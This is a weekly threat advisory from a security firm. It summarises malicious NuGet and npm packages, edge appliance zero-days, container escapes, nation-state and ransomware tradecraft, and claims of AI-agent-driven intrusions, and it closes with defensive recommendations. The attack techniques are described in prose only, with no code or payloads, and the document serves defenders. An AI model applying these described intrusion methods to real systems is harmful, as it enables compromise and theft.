Trust Is the New Attack Surface — Supply-Chain Sabotage, AI-Scaled Intrusions & Edge Zero-Days

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Supply Chain = Soft Underbelly

Attackers are blending tiny, surgical payloads into trusted developer ecosystems (NuGet, npm, IDE marketplaces) so compromise looks like normal dev activity. The result is intermittent failures, credential leakage, and CI/CD token theft—often without obvious alarms.

• NuGet: covert sabotage with probabilistic kill-switches — Nine .NET packages hide ~20-line hooks that, on 2027–28 triggers, randomly kill processes (~20%) and can corrupt Siemens S7 PLC writes after a 30–90 min delay—engineered to frustrate diagnosis.

• VS Code + npm cluster → Vidar 2.0 — A rogue VS Code extension exfiltrates and encrypts local files while polling a private GitHub repo for C2; 17 npm packages use postinstall to drop Vidar 2.0 and resolve C2 via Telegram/Steam.

• @acitons/artifact typosquat (later confirmed Red-Team) — A near-name npm package harvested GitHub Actions secrets during postinstall and staged encrypted exfil to an app.github.dev subdomain—tactic is realistic even if this run was controlled.

• Global supply-chain pressure — Beyond single packages, 2025 saw SSO/provider breaches, dormant Magento backdoors re-awakened, npm maintainer token theft, and ransomware disruptions across manufacturing and logistics.

2. AI in the Kill Chain

AI now amplifies both persuasion and operations. Deepfakes accelerate social engineering on real-time rails, while claims of agentic intrusions—debated or not—signal where attacker tradecraft is heading.

• Payments: AI-driven fraud at speed — Voice clones, dual-call scams, and QR payload tricks target UPI/RTP flows; RatOn Android and abused RMM tools enable covert access and rapid cash-out to crypto.

• Agentic espionage (claims under scrutiny) — A report alleges 80–90% autonomous intrusion using an AI coding agent across ~30 orgs; the community disputes missing IOCs, but the automation pattern is instructive.

3. Edge & Appliance Zero-Days

Internet-facing appliances remain low-friction entry points. Fresh pre-auth flaws translate into instant admin and turnkey footholds for lateral movement.

• FortiWeb: header-forged admin via fwbcgi — Path traversal plus a crafted CGIINFO header lets attackers impersonate admin and add persistent local admins; active exploitation preceded patches.

• QNAP NAS: seven zero-days patched — CGI overflows, command injection, and path traversal enable unauth RCE against QTS/QuTS hero and backup apps; rapid patching is critical for ransomware prevention.

• ASUS DSL routers: auth bypass (CVE-2025-59367) — Remote, unauthenticated admin on DSL-AC51/N16/AC750 fixed in 1.1.2.3_1010; WAN-exposed units are prime botnet targets.

4. Runtime & Enterprise Escalation

Small runtime misconfigurations can chain into container escapes and domain dominance—often by abusing legitimate features and “expected” admin tooling.

• runC: unsafe bind-mount/symlink handling — Three flaws allow arbitrary host writes and potential container escape where custom mounts/privileged configs are allowed; fixed in 1.2.8/1.3.3/1.4.0-rc.3.

• UNC6485 on Triofox (CVE-2025-12480) — Auth bypass re-runs setup to add “Cluster Admin”; AV path abuse executes under SYSTEM, drops Zoho Assist/AnyDesk, and tunnels RDP via SSH to climb to Domain Admin.

5. Nation-State Tradecraft: Quiet Persistence & Device Wipes

State-aligned actors emphasize long-dwell stealth—scheduled tasks, LOLBins, DLL side-loading—and even weaponize legitimate cloud device-management to erase traces on mobile endpoints.

• PRC-aligned cluster activity — Steady use of SYSTEM scheduled tasks, msbuild.exe/csc.exe egress, AV-path DLL side-loading, and misconfigured IIS for durable domain-wide reach.

• Konni/Kimsuky: Android wipes via Find Hub — Stolen Google/Naver creds enable remote Android resets; Windows persistence via AutoIt + scheduled tasks with multi-RAT tooling (EndRAT, Remcos, Quasar).

6. Ransomware & TTP Shifts

“Leak-first” extortion keeps outpacing encryption. New families iterate quickly while loaders target browser sessions and MFA cookies to streamline exfil and pressure.

• Weekly landscape snapshot — Kyber, ShadowLock, VoidCrypt, Yurei rebrands; tradecraft like fast-flux DNS, TOR2DNS relays, and disposable C2 expands; telecom, gov, manufacturing, and cloud/CI/CD remain in the blast zone.

Proactive Steps for the Week

• Lock down the dev supply chain: Enforce signed/verified publishers, pin exact versions + hashes, block lifecycle scripts by default in CI (--ignore-scripts), and allow-list IDE extensions. Hunt for date-based logic, Process.Kill(), and tiny extension methods hooking DB/PLC calls.

• Harden secrets in CI/CD: Scope GitHub/PAT tokens minimally, rotate anything touched by unvetted builds, segregate “install” jobs from secrets, and monitor runner egress to GitHub-like domains.

• Patch the edge fast: Prioritize FortiWeb, QNAP, and ASUS firmware; remove public management access, enforce 2FA, and restrict admin interfaces behind VPN/ACLs.

• Container runtime guardrails: Upgrade runC; avoid privileged/custom-mount containers; adopt rootless mode and user namespaces; alert on suspicious symlink/bind-mount behavior.

• Identity & egress controls: Add adaptive MFA/lockouts, tighten DC replication rights, and monitor compiler/AV processes making outbound connections.

• Payment-fraud defenses: Add voice-biometric or in-app confirmations for high-value transfers; sandbox QR payloads with redirects/encodings; rate-limit new payees and watch UPI-to-crypto flows.

• Mobile & dev endpoint hygiene: Enforce MDM on developer laptops; review Google/Naver account access, revoke sessions, and audit for Find-Hub actions.

• AI abuse readiness: Log prompts targeting guardrail bypass, require human approval for sensitive AI-assisted operations, and build detections for unusually fast, multi-threaded recon/exploitation sequences.